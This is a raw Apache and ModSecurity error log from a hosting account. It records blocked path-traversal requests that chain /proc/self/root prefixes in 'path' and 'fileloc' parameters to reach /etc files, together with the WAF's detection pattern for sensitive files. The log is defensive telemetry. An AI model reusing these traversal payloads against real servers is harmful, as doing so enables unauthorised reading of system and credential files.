"ab1kGvHIg5MgXLBnicMrNAAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:32.554112 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:40486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kHPqxLDW4GITHUkQhwgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:38.515549 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:40486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kIvqxLDW4GITHUkQhzAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:13:39.631129 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.9:33524] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1kI_XLqtnMIWvjpaLTVgAAApQ"]
[Fri Mar 20 12:13:48.423563 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:38978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kLPXLqtnMIWvjpaLTbgAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:53.854948 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:42282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kMfXLqtnMIWvjpaLTggAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:14:05.290477 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:37834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kPPXLqtnMIWvjpaLTmgAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:14:09.625117 2026] [mime_magic:error] [pid 21219:tid 140411607643904] (70014)End of file found: [client 57.141.18.49:34802] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:14:34.969357 2026] [mime_magic:error] [pid 9818:tid 140411599251200] (70014)End of file found: [client 74.7.241.31:55098] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run
[Fri Mar 20 12:14:36.678756 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.228.61:37860] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1kXAF0L0L-SsrnPo6fFQAAAtY"]
[Fri Mar 20 12:14:46.530995 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.241.31:60436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kZgF0L0L-SsrnPo6fIAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:14:47.809606 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:36718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kZxCii7xarUs8iHahrQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:14:49.167644 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:36730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kaTJ3M9BSuKP7CAZgPAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:14:50.382158 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:36734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kata6ubjKNq_cu4YT_AAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:14:51.671834 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:36742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kazJ3M9BSuKP7CAZgRAAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:14:54.111323 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.241.31:36750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kbvqxLDW4GITHUkQiAgAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:14:55.986885 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:50930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kb_XLqtnMIWvjpaLT8gAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:14:56.405165 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:36764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kcPXLqtnMIWvjpaLT8wAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:03.284097 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.53:37022] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1kd11pVZ5mVmJwsFNlLQAAAE8"]
[Fri Mar 20 12:15:03.697292 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:37606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kdwF0L0L-SsrnPo6fKQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:05.570502 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:37612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1keRCii7xarUs8iHahtgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:06.937482 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:37620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kevqxLDW4GITHUkQiEgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:08.267441 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:56766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kfOoXxyEfFpUF8f-2hwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:09.547747 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:56774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kffXLqtnMIWvjpaLT_wAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:10.869516 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:56784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kfuoXxyEfFpUF8f-2iQAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
